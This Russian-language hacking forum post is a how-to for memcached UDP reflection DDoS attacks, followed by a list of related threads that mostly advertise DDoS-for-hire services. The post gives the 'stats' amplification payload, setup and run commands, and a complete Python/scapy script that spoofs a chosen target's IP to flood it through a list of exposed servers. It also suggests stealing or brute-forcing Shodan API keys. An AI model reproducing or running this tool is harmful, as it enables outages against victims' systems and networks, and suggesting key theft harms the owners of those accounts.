Усиливаем ddos атаки с помощью уязвимости в Memcached

Admin

Original poster
Administrator
Сообщения
902
Реакции
716
Посетить сайт
Суть в том, что все вы не взломаете, насколько крутыми вы бы не были, всегда найдется тот, кто круче вас. Для Хакера, DDOS - это последнее, чем он воспользуется. Мне не раз приходилось отбивать атаки и с каждым разом они становились все мощнее. Хакеры уже перестали взламывать, когда они могут устроить ddos атаку. Теперь даже не нужно создавать ботнет, в интернете много уязвимых серверов, которые усиливают атаки. И вот обнаружили новую уязвимость, которая позволяет усиливать атаки. Для того, чтобы совершить атаку достаточно знать ip адреса уязвимых серверов c открытым портом 11211. Таких адресов около 17 тыс. На порт уязвимого сервера отправляется пакет:
\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
После обработки пакета сервер отвечает большим пакетом до 1mb. Это позволило совершить атаку в 1,3 ТБ/с. Github не справился с атакой, иностранный провайдер тоже, а ведь чтобы запустить такую атаку нужно всего-то пару минут.

Практика
Для начало нам нужно найти сервера, для этого мы воспользуемся

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

.
1.png
Или воспользуемся уже готовым списком, который собрали до нас -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Скрипт для атаки написан на python 2.7.
sudo apt-get install python
Далее установим библиотеки:
Код:
python -m pip install datetime
python -m pip install scapy
Итак, запускаем программу:
Код:
python namescript.py -T xx.xx.xx.xx -S file.txt -P 100 -Thread 100
T - Цель
S - Файл с уязвимыми серверами
P - Кол-во отправленных пакетов
Thread - Потоки
2.png
Ссылка на программу -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

[DOUBLEPOST]Automatically Merged Double Post[/DOUBLEPOST]Да для виндовc нужно поставить WinPcap:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Автор сделал скрипт с парсингом серверов через Shodan, по этому вам нужен будет ключик для него, который вы можете купить, сбрутить, спиздить.

Уже чувствую ваше возмущение "Ну ты шо так газуешь дядь? какие ключи, какой шодан?"
Специально для вас урезанная версия скрипта, без шодана, ip берутся из bots.txt':

Python:
#!/usr/bin/python
import sys, os, time
from pathlib import Path
from scapy.all import *
from contextlib import contextmanager

starttime=time.time()

@contextmanager
def suppress_stdout():
    with open(os.devnull, "w") as devnull:
        old_stdout = sys.stdout
        sys.stdout = devnull
        try:
            yield
        finally:
            sys.stdout = old_stdout

class color:
    HEADER = '\033[0m'

logo = color.HEADER + '''

   ███╗   ███╗███████╗███╗   ███╗ ██████╗██████╗  █████╗ ███████╗██╗  ██╗███████╗██████╗
   ████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║  ██║██╔════╝██╔══██╗
   ██╔████╔██║█████╗  ██╔████╔██║██║     ██████╔╝███████║███████╗███████║█████╗  ██║  ██║
   ██║╚██╔╝██║██╔══╝  ██║╚██╔╝██║██║     ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝  ██║  ██║
   ██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║  ██║██║  ██║███████║██║  ██║███████╗██████╔╝
   ╚═╝     ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚═════╝

                                        Author: @037
                                        Version: 3.1

####################################### DISCLAIMER ########################################
| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable  |
| memcached servers. It then allows you to use the same servers to launch widespread      |
| distributed denial of service attacks by forging UDP packets sourced to your victim.    |
| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly.   |
| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
###########################################################################################
                                                                                    
'''
print(logo)

target = input("[▸] Enter target IP address: ")
power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
data = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"

while True:
    try:
        ip_arrayn = []
        with open('bots.txt') as my_file:
            for line in my_file:
                ip_arrayn.append(line)
        ip_array = [s.rstrip() for s in ip_arrayn]
        counter= int(0)
        for i in ip_array:
            if power>1:
                print('[+] Sending %d forged UDP packets to: %s' % (power, i))
                with suppress_stdout():
                    send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
            elif power==1:
                print('[+] Sending 1 forged UDP packet to: %s' % i)
                with suppress_stdout():
                    send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
    except:
        print('')
        print('[•] Exiting Platform. Have a wonderful day.')
        break
Запускать так:
cd %путь_до_ файлов_Memcrashed.py_и_bots.txt%
python.exe Memcrashed.py
Вас спросят IP который вы хотите дудосить и кол-во серверов с которых будет идти дудос.
17к IP которые можешь засунуть в bot.txt:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Также можешь насканить себе еще серверов по порту 11211.​
 
Последнее редактирование:
  • Like
Реакции: User_Undefined
Название темы
Автор Заголовок Раздел Ответы Дата
119emperor DDOS аТаки !!!- услуги по временному отключению сайтов/серверов Ищу работу. Предлагаю свои услуги. 2
Antonka_1000 У кого нибудь прога для DDOS'а серверов CS1.6???? Вопросы и интересы 2
zodiaq Услуги "Ddos Attack" Спам / Флуд / Ддос 3
turbion0 Проверено DDOS от ↯Turbion Service↯ Спам / Флуд / Ддос 1
S Куплю приватный ботнет для DDOS атак Куплю/Обменяю 0
DdMass [Service]MASSIVE DDOS/ Мгновенное тестирование вашего ресурса. Ищу работу. Предлагаю свои услуги. 4
superman_ddos Service DDOS Attack/ДДОС Атака на заказ. Профессионалы к вашим услугам. Спам / Флуд / Ддос 2
G Аренда DDOS мощностей с помесячной оплатой,хватит переплачивать псевдо ддосерам.(V 1.0) Спам / Флуд / Ддос 2
jsbypass >>> DDOS-SERVICE <<< | УСТРАНЯЕМ КОНКУРЕНТОВ Ищу работу. Предлагаю свои услуги. 8
0 Проверено DDoS Stresser|Best Layer7 Power| Устрани своего конкурента| Спам / Флуд / Ддос 16
Doppler DDoS SerVice #1(Устраняем ваших конкурентов) Ищу работу. Предлагаю свои услуги. 0
johnykabina22 Предлагаю вам качественные услуги DDoS Attack Спам / Флуд / Ддос 1
NickelBlack DDOS SYN Flood Spam/DDOS/Malware 1
D Положим (сделаем недоступным) сайт! Ddos-сервис к вашим услугам! Проведём мощную ддос-атаку, устраним конкурентов легко и быстро! Спам / Флуд / Ддос 1
S Как защитить сайт от DDos Атак? Вопросы и интересы 2
Denik Интересно Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты Уязвимости и взлом 1
N Предоставляю услуги по устранению сайтов и серверов с помощью DDOS атак.Наш сервис поможет решить ваши проблемы с конкурентами. Спам / Флуд / Ддос 0
S Продам SpideHost - Абузоустойчивые VPS/VDS + VIP FastFlux, MassScan, DDOS, AntiDDOS Сайты/Хостинг/Сервера 0
NickelBlack BlackNET Botnet v3.5 [Stealer+Keylogger+DDOS] .NET 14
Kot507 [Розыгрыш] Скрипт ddos атаки на сайт. Розыгрыши 0
LegolasGL Интересно Участник «Сколково» защитит МТ5-брокеров от DDoS-атак Новости в сети 0
D Обучение DDos Вопросы и интересы 0
Denik Интересно DDOS сайта при использовании WordPress Уязвимости и взлом 0
LegolasGL Интересно Домены биржи Binance подверглись DDoS-атаке Новости в сети 0
АнАлЬнАя ЧуПаКаБрА INLINE ddos сайта Проекты Private Keeper 5
Trixionit Набор в состав, для Ddos атак! Предоставляю работу. Ищу специалиста. 0
PowerMagnet Проверено =>MAGNIT-DDoS Attack Service!Оперативно,Круглосуточно,Качественно! Спам / Флуд / Ддос 6
X ⁣ ЗАКАЗАТЬ DDoS АТАКУ // МОЩНЫЙ СЕРВИС!!! Ищу работу. Предлагаю свои услуги. 1
A Защита от DDoS атак Anti-DDoS PRO Ищу работу. Предлагаю свои услуги. 0
T Продам Уникальный DDOS-Сервис Спам / Флуд / Ддос 4
SSHMAN DDoS-атаки в четвертом квартале 2019 года Новости в сети 0
SSHMAN DDoS Bluetooth устройств. Отключаем всё вокруг. Полезные статьи 5
T DDos-сервис через telegram Спам / Флуд / Ддос 1
ALFA16 Интересно (РЕКОМЕНДУЮ) Заказ DDOS атаки - Услуги по устранению конкуренции. Ищу работу. Предлагаю свои услуги. 3
E Мощнейший спам звонками и SMS + любой вид DDoS-атаки Termux Раздача email 1
Admin Отказ от обслуживания. Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты Полезные статьи 1
grilder DDoS услуги | Обход DDoS Guard + CloudFlare + Captcha Ищу работу. Предлагаю свои услуги. 1
D Как провести DDOS атаку на сайт? Вопросы и интересы 3
KLAIDE Услуги DDOS Atack на заказ Ищу работу. Предлагаю свои услуги. 1
D DDOS.CHEAP ЛУЧШАЯ ПАНЕЛЬ ДЛЯ DDOS АТАК Спам / Флуд / Ддос 0
layer4 DDOS УСЛУГИ ОТ GERMANYFLOOD | ДЁШЕВО И КАЧЕСТВЕННО Ищу работу. Предлагаю свои услуги. 0
private_hub Продам >>>>DDos панель, аренда мощностей без посредников. Самостоятельный сервис Спам / Флуд / Ддос 0
C Just Ddos It//Ддос для всех// Ддос как способ решить проблему Спам / Флуд / Ддос 15
W (Recommend)Western DDoS Attack Service!Анонимно-Быстро-Качественно! Спам / Флуд / Ддос 0
D Продам DDoS атака|DeniaLofService|Устранение конкурентов Спам / Флуд / Ддос 10
Ddosya Продам [RECOMMEND] Ddos Сorporation / Тестируй сайты-устраняй конкурентов Спам / Флуд / Ддос 0
grilder1 Заказать Услуги Ddos - На Сайт | Test - [ Бесплатно ] Ищу работу. Предлагаю свои услуги. 3
DDoSNumber Проверено ⁣ DDoS / flood / replace number заходи! Спам / Флуд / Ддос 17
D DDoS атака|DeniaLofService|Устранение конкурентов Ищу работу. Предлагаю свои услуги. 2
M Проверено Deucalion IRC 2.51 DDoS Botnet | JS Bypass | CloudFlare Bypass Malware, эксплойты, связки, крипт 0

Название темы